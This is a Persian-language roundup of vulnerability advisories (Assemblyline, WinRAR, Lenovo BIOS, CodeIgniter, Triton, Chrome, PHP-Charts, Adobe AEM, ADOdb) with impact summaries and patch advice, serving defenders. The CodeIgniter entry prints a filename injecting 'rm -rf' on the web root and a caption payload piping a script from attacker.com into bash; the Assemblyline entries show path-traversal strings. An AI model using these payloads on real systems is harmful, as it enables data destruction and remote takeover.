کشف آسیب‌پذیری بحرانی در Assemblyline 4 Service Client

تاریخ ایجاد

Assemblyline یک چارچوب متن‌باز تحلیل خودکار بدافزار است که برای پردازش و ارزیابی سریع حجم بالایی از فایل‌ها و نمونه‌های مشکوک استفاده می‌شود. این پلتفرم از معماری سرویس‌محور استفاده می‌کند که در آن سرویس‌ها توسط ماژول Service Client با API مرکزی تبادل داده می‌کنند.

 

جزئیات آسیب‌پذیری

در نسخه‌های آسیب‌پذیر این ابزار، فایل task_handler.py در Service Client مقدار هش SHA-256 بازگشتی از سرور سرویس را مستقیماً به‌عنوان نام فایل محلی استفاده می‌کند، بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی ورودی. یک سرور مخرب یا مهاجم در موقعیت مرد میانی می‌تواند مقداری مانند "etc/cron.d/evil/../../.." بازگرداند و باعث شود که کلاینت داده‌های دریافتی را در مسیر دلخواه سیستم قربانی ذخیره کند. این مسئله امکان نوشتن یا بازنویسی فایل‌های حیاتی سیستم را فراهم می‌سازد و می‌تواند منجر به اجرای کد مخرب یا تغییر پیکربندی سیستم شود.

این آسیب‌پذیری در سناریوهایی قابل بهره‌برداری است که کلاینت به یک سرویس غیرقابل اعتماد متصل شود یا مسیر ارتباطی بین کلاینت و سرویس در معرض حملات مرد میانی قرار داشته باشد.

بردار حمله:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

این بردار نشان می‌دهد که آسیب‌پذیری از راه دور و بدون نیاز به تعامل کاربر یا داشتن مجوز قابل بهره‌برداری است. در صورت موفقیت، مهاجم می‌تواند یکپارچگی و دسترس‌پذیری سیستم را تحت تأثیر قرار دهد، اما بر محرمانگی داده‌ها تأثیر مستقیم ندارد.

 

نسخه‌های تحت‌تأثیر

  • تمامی نسخه‌های قبل از ‎4.6.1.dev138 تحت تأثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی: ارتقا به نسخه‌ی ‎4.6.1.dev138 یا بالاتر که در آن اعتبارسنجی مسیر و پاک‌سازی نام فایل پیاده‌سازی شده است.
  • استفاده از TLS/SSL معتبر و امن برای جلوگیری از حملات مرد میانی.
  • محدود کردن دسترسی نوشتن در مسیرهای حساس سیستم.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-55013

[2]https://www.cvedetails.com/cve/CVE-2025-55013

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-55013

[4]https://www.cve.org/CVERecord?id=CVE-2025-55013

[5]https://github.com/CybercentreCanada/assemblyline/security/advisories/GHSA-75jv-vfxf-3865

[6]https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51…

کشف آسیب‌پذیری در WinRAR

تاریخ ایجاد

یک آسیب‌پذیری با شناسه CVE-2025-8088 و شدت بالا با امتیاز 8.4 شناسایی شده است. این آسیب‌پذیری از نوع Path Traversal (پیمایش مسیر غیرمجاز) بوده و در نسخه ویندوز نرم‌افزار WinRAR وجود دارد. این نقص امنیتی به مهاجمان اجازه می‌دهد با ساخت فایل‌های فشرده مخرب، فایل‌هایی را در مسیرهای دلخواه سیستم قربانی استخراج کنند. این فایل‌ها می‌توانند شامل فایل‌های اجرایی باشند که در پوشه‌های Startup ویندوز قرار می‌گیرند، مانند:

  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (Local to user)

  • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup (Machine-wide)

استخراج این فایل‌ها باعث می‌شود کدهای مخرب به‌صورت خودکار هنگام ورود کاربر به سیستم اجرا شوند. این موضوع امکان اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) را برای مهاجم فراهم می‌کند و در نتیجه، مهاجم کنترل کامل سیستم قربانی را به دست می‌آورد.

 

محصولات آسیب‌پذیر
تمامی نسخه‌های ویندوزی نرم‌افزارهای WinRAR ،RAR ،UnRAR و کتابخانه‌ی UnRAR.dll تحت تأثیر این آسیب‌پذیری قرار دارند. نسخه‌های این نرم‌افزارها برای سیستم‌عامل‌های یونیکس و اندروید آسیب‌پذیر نیستند.

 

توصیه‌های امنیتی
با توجه به جزئیات آسیب‌پذیری مذکور، توصیه‌های امنیتی زیر پیشنهاد می‌شود:

  • انجام به‌روزرسانی فوری نرم‌افزار WinRAR به نسخه‌ی 7.13.
  • افزایش سطح آگاهی کاربران نسبت به حملات فیشینگ و اجتناب از باز کردن فایل‌های فشرده دریافت‌شده از منابع ناشناس یا غیرقابل اعتماد.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8088

[2]https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-…

کشف آسیب‌پذیری در محصولات Lenovo

تاریخ ایجاد

چهار آسیب‌پذیری با شدت بالا در سیستم‌های شرکت Lenovo شناسایی شده‌اند که هرکدام امتیاز 8.2 از 10 را در سیستم CVSS دریافت کرده‌اند. چهار آسیب‌پذیری CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 دارای بردار حمله یکسانی هستند که نشان‌دهنده سطح بالای خطر و پیچیدگی پایین در بهره‌برداری از آن‌هاست. بردار حمله‌ی این آسیب‌پذیری‌ها به شرح زیر است:

/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

حملات از طریق دسترسی محلی هستند (AV:L)، پیچیدگی پایین دارند (AC:L)، به مجوز سطح بالا (PR:H) و تعامل کاربر (UI:N) نیاز ندارند. دامنه تأثیر فراتر از مؤلفه آسیب‌پذیر است (S:C) و تأثیر بالایی بر محرمانگی، تمامیت و دسترس‌پذیری می‌گذارند (C:H/I:H/A:H).

آسیب‌پذیری‌های CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 همگی نقص‌هایی در مؤلفه‌های سطح پایین Firmware BIOS هستند که مهاجمان را قادر می‌سازند کنترل کامل سیستم را به‌دست بگیرند. این آسیب‌پذیری‌ها در ماژول‌های SMM، DXE و SetupAutomationSmm رخ می‌دهند و بهره‌برداری موفق از آن‌ها می‌تواند منجر به اجرای کد دلخواه، افزایش سطح دسترسی و حتی تخطی از Secure Boot شود.

این ضعف‌ها به‌دلیل نوشتن خارج از محدوده حافظه و سرریز بافر روی پشته به وجود آمده‌اند:

  • آسیب‌پذیری CVE-2025-4421 و CVE-2025-4422 از نوع نوشتن خارج از محدوده حافظه هستند (CWE-787).
  • آسیب‌پذیری CVE-2025-4423 از نوع محدودیت نادرست در عملیات حافظه است (CWE-119).
  • آسیب‌پذیری CVE-2025-4425 از نوع سرریز بافر مبتنی بر پشته است (CWE-121).

از آن‌جا که حملات در سطح پایین سیستم انجام می‌شوند، حتی پس از نصب مجدد سیستم‌عامل نیز باقی می‌مانند و ممکن است تأثیر آن‌ها به سایر بخش‌های امنیتی سیستم نیز گسترش یابد.

 

محصولات آسیب‌پذیر

  • لپ‌تاپ‌ها و دسکتاپ‌های شرکت Lenovo که از نسخه‌های خاصی از Firmware مبتنی بر Insyde BIOS استفاده می‌کنند.
  • سیستم‌هایی که از ماژول‌های EfiSmiServices، EfiPcdProtocol و SetupAutomationSmm بهره می‌برند.
  • نسخه‌هایی که فاقد بررسی‌های امنیتی در حافظه SMM یا پشته هستند.
  • سیستم‌هایی که به‌روزرسانی‌های امنیتی منتشرشده تا 30 جولای 2025 را دریافت نکرده‌اند.

 

توصیه‌های امنیتی

  • بررسی نسخه‌ی BIOS و به‌روزرسانی به نسخه‌های امن منتشرشده توسط Lenovo.
  • فعال‌سازی مکانیزم‌های حفاظتی مانند Secure Boot و Firmware Integrity Verification.
  • استفاده از ابزارهای تحلیل Firmware مانند Binarly efiXplorer برای بررسی آسیب‌پذیری‌های مشابه.
  • محدودسازی دسترسی فیزیکی و محلی به دستگاه‌ها.
  • نظارت بر تغییرات غیرمجاز در Firmware با استفاده از راهکارهایی مانند HP Sure Start یا Lenovo Eclypsium.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-4425

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-4421

[3]https://nvd.nist.gov/vuln/detail/CVE-2025-4423

[4]https://nvd.nist.gov/vuln/detail/CVE-2025-4422

کشف آسیب‌پذیری اجرای فرمان در PHP CodeIgniter

تاریخ ایجاد

CodeIgniter یک چارچوب توسعه برنامه‌های تحت وب PHP Full-stack است که به دلیل سادگی و کارایی بالا بسیار پرکاربرد است. اخیراً یک آسیب‌پذیری بحرانی با شناسه‌ی CVE-2025-54418 و شدت 9.8 در کتابخانه ImageMagick که امکان پردازش تصاویر را در CodeIgniter فراهم می‌سازد، شناسایی شده است. استفاده نادرست از این کتابخانه در کنار ورودی‌های غیرایمن کاربر می‌تواند منجر به آسیب‌های جدی امنیتی شود.

 

جزئیات آسیب‌پذیری

این آسیب‌پذیری یک نقص امنیتی از نوع تزریق دستورات سیستم‌عامل است که هنگام استفاده از ابزار ImageMagick به‌عنوان ابزار پردازش تصویر رخ می‌دهد. از آن‌جا که اجرای ImageMagick در سطح سیستم‌عامل انجام می‌شود، این آسیب‌پذیری به مهاجم اجازه می‌دهد از طریق روش‌های زیر حمله را انجام دهد و فرمان‌های دلخواه سیستم‌عامل را اجرا کند:

1. آپلود فایلی با نام مخرب

آپلود فایلی که نام آن شامل کاراکترهای خاص مورد استفاده در پوسته سیستم‌عامل باشد و با همین نام ذخیره و با استفاده از متد ()resize پردازش ‌شود. به‌عنوان مثال، فایل با نام زیر اگر توسط ابزار ImageMagick تحلیل شود، منجر به حذف کل فایل‌های وب‌سرور می‌گردد:

$(rm -rf /var/www/html/*).jpg

2. استفاده از ورودی متنی مخرب در متد ()text

وارد کردن متنی مخرب هنگام استفاده از ()متد text با استفاده از ورودی‌های اعتبارسنجی‌نشده، به مهاجم امکان می‌دهد دستورات دلخواه را اجرا کرده و کنترل کامل سیستم قربانی را به دست آورد. به‌عنوان مثال، اگر کاربر متن زیر را از طریق متد ()text برای درج روی یک تصویر وارد نماید، به دلیل عدم پاک‌سازی ورودی، کد مخربی از سرور مهاجم دانلود شده و منجر به نصب درب پشتی، سرقت اطلاعات یا کنترل کامل سیستم می‌شود:

caption:@|bash -c "curl http://attacker.com/shell.sh | bash"

 

بردار CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H نشان می‌دهد بهره‌برداری از آن نیازی به دسترسی قبلی و تعامل کاربر ندارد و مهاجم می‌تواند از طریق ارسال درخواست از راه دور، بدون احراز هویت و با کمترین پیچیدگی، فرمان‌هایی را اجرا کند که منجر به افشای اطلاعات حساس، تغییر یا تخریب داده‌ها، و توقف کامل سرویس شود. این نقص امنیتی محرمانگی، یکپارچگی و دسترس‌پذیری سامانه را تحت تأثیر قرار می‌دهد.

 

نسخه‌های تحت‌تأثیر

  • تمام نسخه‌های CodeIgniter قبل از 4.6.2 که از ImageMagick به‌عنوان پردازشگر تصویر استفاده می‌کنند، در معرض این حمله قرار دارند.

 

توصیه‌های امنیتی

  • ارتقا CodeIgniter به نسخه‌ی 4.6.2 یا بالاتر.
  • استفاده از ابزار پردازشگر پیش‌فرض GD به‌جای ImageMagick که نسبت به این آسیب‌پذیری ایمن است.
  • هنگام ذخیره فایل‌های آپلودشده، از نام‌های تصادفی مانند خروجی تابع ()getRandomName یا ()store استفاده شود تا از تزریق کاراکترهای مخرب در نام فایل جلوگیری گردد.
  • در کاربرد تابع ()text، لازم است ورودی‌ها پاک‌سازی شده و کاراکترهای غیرمجاز حذف شوند.

 

منابع خبر:

[1]https://www.cvedetails.com/cve/CVE-2025-54418

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-54418

[3]https://www.cve.org/CVERecord?id=CVE-2025-54418

[4]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-54418

[5]https://github.com/codeigniter4/CodeIgniter4/security/advisories

کشف آسیب‌پذیری در کلاینت سرویس Assemblyline

تاریخ ایجاد

کلاینت سرویس Assemblyline 4 بخشی از پلتفرم Assemblyline است که به‌عنوان واسط بین سرویس‌های پردازش و هسته مرکزی این سیستم عمل می‌کند. وظیفه آن دریافت وظایف از هسته Assemblyline از طریق API، دانلود فایل‌ها یا داده‌های مورد نیاز، تحویل آن‌ها به سرویس پردازشی برای تحلیل، و در نهایت ارسال نتایج پردازش به هسته است. این کلاینت یک چارچوب آماده و استاندارد فراهم می‌کند تا توسعه‌دهندگان بتوانند سرویس‌های خود را بدون نیاز به پیاده‌سازی کامل منطق ارتباطی با سیستم اصلی، به‌راحتی به Assemblyline متصل کنند.

در نسخه‌های قبل از 4.6.1.dev138، در فایل task_handler.py، مقدار SHA-256 دریافتی از سرور سرویس بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی، مستقیماً به‌عنوان نام یک فایل محلی استفاده می‌شود. در چنین شرایطی، اگر سرور سرویس مخرب یا آلوده باشد یا حتی یک مهاجم در میانه مسیر بتواند پاسخ سرور را دستکاری کند، امکان ارسال یک مقدار ساختگی به‌جای SHA-256 واقعی وجود دارد. برای مثال، مهاجم می‌تواند رشته‌ای شامل مسیر نسبی مخرب مانند مسیر زیر را برگرداند:

../../../etc/cron.d/evil

کلاینت بدون بررسی، این مقدار را به‌عنوان مسیر ذخیره‌سازی فایل در نظر می‌گیرد و داده دریافتی را در مسیر دلخواه مهاجم روی دیسک می‌نویسد. این موضوع منجر به آسیب‌پذیری Path Traversal و در نتیجه امکان نوشتن فایل در مکان‌های حساس سیستم می‌شود که می‌تواند اجرای کد مخرب یا تغییر پیکربندی‌های حیاتی را به دنبال داشته باشد.

pic

 

محصولات آسیب‌پذیر

  • نسخه‌های قبل از 4.6.1.dev138

 

توصیه‌های امنیتی

  • این مشکل در نسخه‌ی 4.6.1.dev138 برطرف شده است. به کاربران توصیه می‌شود که از نسخه‌ی 4.6.1.dev138 استفاده نمایند.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-55013

[2]https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51…

کشف آسیب‌پذیری در سرور NVIDIA Triton

تاریخ ایجاد

آسیب‌پذیری CVE-2025-23310 با شدت 9.8 ناشی از سرریز بافر پشته در اجزای پردازش ورودی‌ها در سرور NVIDIA Triton است. مهاجم می‌تواند با ارسال ورودی‌های ساختگی و بزرگ‌تر از اندازه بافر پیش‌بینی‌شده، باعث بروز سرریز در حافظه شود. این موضوع می‌تواند به اجرای کد دلخواه روی سرور منجر شود یا در نتیجه آن، سرور از کار بیفتد (Denial of Service). همچنین احتمال افشای داده‌ها یا تغییر غیرمجاز آن‌ها نیز وجود دارد.

آسیب‌پذیری CVE-2025-23311 با شدت 9.8 مشابه مورد قبلی است، ولی در پردازشگر درخواست‌های HTTP سرور رخ می‌دهد. ارسال درخواست‌های HTTP با قالب خاص باعث سرریز بافر پشته می‌شود. بهره‌برداری موفق از این نقص می‌تواند منجر به اجرای کد از راه دور، ایجاد اختلال در سرویس، افشای داده‌ها و تغییر آنها گردد.

 

محصولات تحت‌تأثیر

  • نسخه‌های آسیب‌پذیر: تمام نسخه‌های قبل از 25.07
  • سیستم‌عامل‌ها: Linux / Windows (تمام توزیع‌های پشتیبانی‌شده)

 

توصیه‌های امنیتی

  • بروزرسانی فوری: نسخه‌های آسیب‌پذیر به نسخه‌ی 25.07 یا جدیدتر به‌روزرسانی شوند.
  • محدود کردن دسترسی: دسترسی به سرور Triton را به شبکه‌های امن و منابع معتبر محدود کنید.
  • مانیتورینگ: لاگ‌ها و ترافیک شبکه را برای شناسایی درخواست‌های غیرعادی یا مشکوک پایش کنید.
  • تست امنیتی: تست نفوذ و ارزیابی امنیتی منظم روی سرور انجام دهید.
  • آموزش: تیم‌های توسعه و عملیات را درباره آسیب‌پذیری‌های buffer overflow و روش‌های مقابله آموزش دهید.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-23310

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-23311

کشف آسیب‌پذیری در دربخش افزونه‌های Google Chrome

تاریخ ایجاد

افزونه‌های مرورگر Chrome با گسترش قابلیت‌های مرورگر به کاربران امکان می‌دهند تعامل با وب‌سایت‌ها را سفارشی‌سازی کرده و فرآیندهای تکراری را خودکار کنند. این سطح از انعطاف‌پذیری باعث می‌شود افزونه‌ها به یکی از نقاط بالقوه برای حملات تبدیل شوند.

 

جزئیات آسیب‌پذیری

در نسخه‌های قبل از 139.0.7258.66 از مرورگر Google Chrome، یک آسیب‌پذیری از نوع Use-After-Free با شناسه‌ی CVE-2025-8576 و شدت 8.8 در بخش افزونه‌ها شناسایی شده است. این نقص به یک مهاجم از راه دور امکان می‌دهد با استفاده از یک افزونه Chrome مخرب، شرایطی ایجاد کند که در آن حافظه‌ای که قبلاً آزاد شده دوباره مورد استفاده قرار گیرد. این دسترسی غیرمجاز به حافظه‌ی آزاد شده می‌تواند منجر به تخریب حافظه شود که زمینه‌ساز قفل کردن و اجرای کد دلخواه خواهد بود.

از آنجا که افزونه‌ها می‌توانند به بخش‌های عمیق‌تری از ساختار مرورگر دسترسی داشته باشند، چنین آسیب‌پذیری‌هایی در صورت ترکیب با سایر نقص‌ها می‌توانند به حملات پیچیده‌تر منجر شوند. تاثیر این آسیب‌پذیری می‌تواند شامل تخریب حافظه، کاهش پایداری سیستم و نفوذ به حریم خصوصی کاربران از طریق نصب یا اجرای غیرمجاز کد در محیط مرورگر باشد.

بردار CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H نشان می‌دهد مهاجم برای بهره‌برداری از این آسیب‌پذیری نیازی به احراز هویت ندارد؛ به همین دلیل مهاجم می‌تواند بدون داشتن دسترسی قبلی به سیستم هدف و تنها با ترغیب کاربر به نصب یا اجرای یک افزونه مخرب، حمله را آغاز کند. پیچیدگی حمله پایین است. موفقیت در اجرای این حمله می‌تواند منجر به افشای اطلاعات حساس، دست‌کاری در داده‌ها و در نهایت اختلال کامل در عملکرد سیستم شود، بنابراین محرمانگی، یکپارچگی و دسترس‌پذیری به‌طور همزمان تحت تأثیر قرار می‌گیرند.

از آنجایی که این آسیب‌پذیری به‌صورت مستقیم سیستم‌عامل یا شبکه را درگیر نمی‌کند و در بستر مرورگر اتفاق می‌افتد، تأثیر آن محدود به مرورگر کاربر است.

 

نسخه‌های تحت‌تأثیر

  • کلیه‌ی نسخه‌های پیش از 139.0.7258.66 تحت تأثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی مرورگر به نسخه‌ی 139.0.7258.66 یا بالاتر
  • عدم نصب افزونه‌های ناشناس یا غیرقابل‌اعتماد: فقط از افزونه‌هایی استفاده کنید که در Chrome Web Store منتشر شده‌اند و دارای امتیاز و بازخورد مناسب هستند.
  • مرور و مدیریت دوره‌ای افزونه‌ها: افزونه‌های نصب‌شده را بررسی نموده و هر افزونه‌ای که استفاده نمی‌شود یا منبع آن مشکوک است را غیرفعال یا حذف نمایید.
  • محدود کردن سطح دسترسی افزونه‌ها در تنظیمات Chrome

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8576

[2]https://www.cve.org/CVERecord?id=CVE-2025-8576

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-8576

[4]https://chromereleases.googleblog.com/2025/08/stable-channel-update-for-desktop.html

کشف آسیب‌پذیری در PHP-Charts v1.0

تاریخ ایجاد

PHP-Charts یک کتابخانه متن‌باز مبتنی بر PHP است که به توسعه‌دهندگان امکان تولید انواع نمودارهای آماری و گرافیکی را به‌سادگی و بدون نیاز به دانش پیشرفته در زمینه گرافیک می‌دهد. PHP-Charts به دلیل سادگی پیاده‌سازی و خروجی‌های قابل سفارشی‌سازی، در بسیاری از وب‌سایت‌های شخصی، پنل‌های مدیریتی و ابزارهای داشبورد داده مورد استفاده قرار می‌گیرد. اخیراً در نسخه‌ی 1.0 این کتابخانه، آسیب‌پذیری با شناسه‌ی CVE-2013-10070 و شدت 10 شناسایی شده است که می‌تواند امنیت کل سرور را تحت تاثیر قرار دهد.

 

جزئیات آسیب‌پذیری

در نسخه‌ی 1.0 از PHP-Charts، فایل wizard/url.php به گونه‌ای طراحی شده که نام پارامترهای ارسال‌شده از طریق متد GET مستقیماً بدون اینکه هیچ‌گونه اعتبارسنجی، فیلتر یا مکانیزم امن‌سازی روی آن‌ها اعمال شود، به تابع ()eval در PHP منتقل می‌شوند. مهاجم می‌تواند از این نقص بهره‌برداری کرده و با ارسال یک درخواست HTTP مخرب، نام پارامتر را به‌گونه‌ای تعریف کند که شامل یک بار مخرب باشد. معمولاً این بار به صورت base64 رمزگذاری شده و سپس توسط ()eval رمزگشایی و اجرا می‌شود. این فرآیند به مهاجم اجازه می‌دهد تا کد PHP دلخواه خود را روی سرور اجرا کند. از آنجا که این کد تحت سطح دسترسی وب‌سرور اجرا می‌شود، مهاجم می‌تواند به فایل‌های سرور دسترسی یافته، دستورات سیستمی اجرا کرده، بدافزار بارگذاری کند یا به اطلاعات حساس دست یابد.

بردار CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H نشان‌دهنده‌ی یک آسیب‌پذیری بحرانی است که بهره‌برداری از آن از راه دور و بدون نیاز به تعامل کاربر امکان‌پذیر است. مهاجم می‌تواند با پیچیدگی پایین و بدون احراز هویت، از این نقص امنیتی سوءاستفاده کرده و محرمانگی، یکپارچگی، در دسترس بودن و حتی امنیت سیستم را به‌طور کامل به خطر اندازد. تأثیر این آسیب‌پذیری در همه ابعاد سیستمی حداکثر ممکن ارزیابی شده است، به طوری که بهره‌برداری موفق می‌تواند منجر به اجرای کد دلخواه، تخریب داده‌ها، افشای اطلاعات حساس و در نهایت تسلط کامل بر سرور هدف گردد.

 

نسخه‌های تحت‌تأثیر

  • PHP-Charts نسخه‌ی 1.0 و سایر نسخه‌هایی که شامل فایل wizard/url.php با طراحی مشابه هستند تحت تاثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی PHP-Charts به آخرین نسخه امن
  • غیرفعال نمودن یا محدود کردن اجرای مستقیم اسکریپت‌های غیرضروری مانند wizard/url.php در تنظیمات وب‌سرور (nginx.conf ،httpd.conf، htaccess)
  • غیرفعال‌سازی توابع خطرناک PHP مانند proc_open ،popen ،shell_exec ،passthru ،passthru ،exec ،eval در فایل تنظیمات PHP (php.ini)

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2013-10070

[2]https://www.cve.org/CVERecord?id=CVE-2013-10070

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2013-10070

[4]https://www.exploit-db.com/exploits/24201

کشف آسیب‌پذیری در Adobe Experience Manager

تاریخ ایجاد

1. اجرای کد از راه دور ناشی از پیکربندی نادرست در Adobe Experience Manager

آسیب‌پذیری CVE-2025-54253 با شدت 10 ناشی از پیکربندی نادرست در Adobe Experience Manager نسخه‌ی 6.5.23 و نسخه‌های قبل است که به مهاجم اجازه می‌دهد بدون نیاز به تعامل کاربر، مکانیزم‌های امنیتی را دور زده و کد دلخواه خود را روی سرور اجرا کند. سوءاستفاده از این آسیب‌پذیری می‌تواند منجر به کنترل کامل سرور، دسترسی به داده‌های حساس و ایجاد درب پشتی شود. این مشکل معمولاً به دلیل فعال بودن حالت توسعه یا تنظیمات پیش‌فرض ناامن رخ می‌دهد.

 

2. آسیب‌پذیری تزریق موجودیت خارجی XML (XXE) در Adobe Experience Manager

آسیب‌پذیری CVE-2025-54254 با شدت 8.6 یک مشکل امنیتی از نوع تزریق موجودیت خارجی XML (XXE) در Adobe Experience Manager نسخه‌ی 6.5.23 و نسخه‌های قبل است. این نقص به مهاجم اجازه می‌دهد از طریق سرویس احراز هویت، درخواست‌های XML خاصی ارسال کرده و به فایل‌های محلی سرور دسترسی یابد. سوءاستفاده از این آسیب‌پذیری می‌تواند به افشای اطلاعات حساس سیستم منجر شود و زمینه را برای حملات پیشرفته‌تر فراهم کند. برای جلوگیری از این مشکل، باید پردازش موجودیت‌های خارجی XML محدود یا غیرفعال شود و نرم‌افزار به‌روزرسانی گردد.

 

محصولات تحت‌تأثیر

برای آسیب‌پذیری CVE-2025-54253:

  • Adobe Experience Manager (AEM) نسخه‌ی 6.5.23 و نسخه‌های قبلی
  • خصوصاً ماژول‌ها و کامپوننت‌های مرتبط با AEM Forms
  • نسخه‌های مستقر شده روی هر پلتفرمی که از این نسخه‌ها استفاده می‌کنند، اعم از محیط‌های ابری یا سازمانی.

برای آسیب‌پذیری CVE-2025-54254:

  • Adobe Experience Manager (AEM) نسخه‌ی 6.5.23 و نسخه‌های قبلی
  • سرویس احراز هویت و سرویس‌های SOAP مرتبط با AEM Forms
  • تمامی محیط‌هایی که از این نسخه‌ها استفاده می‌کنند، اعم از سرورهای محلی (On-Premise) یا زیرساخت‌های ابری

 

توصیه‌های امنیتی

برای آسیب‌پذیری CVE-2025-54253 (اجرای کد از راه دور RCE):

  • بروزرسانی فوری AEM به نسخه‌های امن
  • غیرفعال‌سازی حالت توسعه در محیط عملیاتی
  • بازبینی پیکربندی‌های امنیتی
  • محدود کردن دسترسی به سرور با فایروال
  • فعال‌سازی لاگ و مانیتورینگ
  • آموزش تیم فنی درباره پیکربندی‌های امنیتی

برای آسیب‌پذیری CVE-2025-54254 (تزریق موجودیت خارجی XML XXE):

  • بروزرسانی سریع AEM به نسخه‌های وصله‌شده
  • غیرفعال‌سازی پردازش موجودیت‌های خارجی در XML
  • فیلتر و اعتبارسنجی ورودی XML
  • محدود کردن دسترسی به سرویس‌های SOAP
  • مانیتورینگ و ثبت درخواست‌های XML
  • آموزش تیم توسعه درباره حملات XXE

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-54253

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-54254

کشف آسیب‌پذیری در PHP

تاریخ ایجاد

افزونه‌ی ADOdb یک کتابخانه‌ی کلاس پایگاه‌داده در زبان PHP است که با فراهم کردن لایه‌ای انتزاعی، فرایند اجرای کوئری‌ها و مدیریت پایگاه‌داده‌ها را ساده و یکپارچه می‌سازد.
در نسخه‌های 5.22.9 و قبل آن، به دلیل improper escaping نادرست یک پارامتر کوئری، این امکان وجود دارد که مهاجم بتواند دستورات دلخواه SQL را اجرا کند؛ این آسیب‌پذیری زمانی رخ می‌دهد که کدی که از ADOdb استفاده می‌کند، به یک پایگاه داده sqlite3 متصل شده و یکی از متدهای ()metaColumns() ،metaForeignKeys یا ()metaIndexes را با نام جدول دست‌کاری‌شده (crafted table name) فراخوانی کند.
شکل زیر بخشی از فایل drivers/adodb-sqlite3.inc.php را نشان می‌دهد.

pic

 

محصولات آسیب‌پذیر

  • نسخه‌های 5.22.9 و قبل آن

 

توصیه‌های امنیتی

  • به کاربران توصیه می‌شود که از نسخه‌ی 5.22.10 استفاده نمایند.
  • برای جلوگیری از بروز این مشکل در نسخه‌های آسیب‌پذیر، فقط باید داده‌های کنترل‌شده را به پارامتر $table در متدهای ()metaColumns() ،metaForeignKeys و ()metaIndexes ارسال کرد.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-54119

[2]https://github.com/ADOdb/ADOdb/commit/5b8bd52cdcffefb4ecded1b399c98cfa516afe03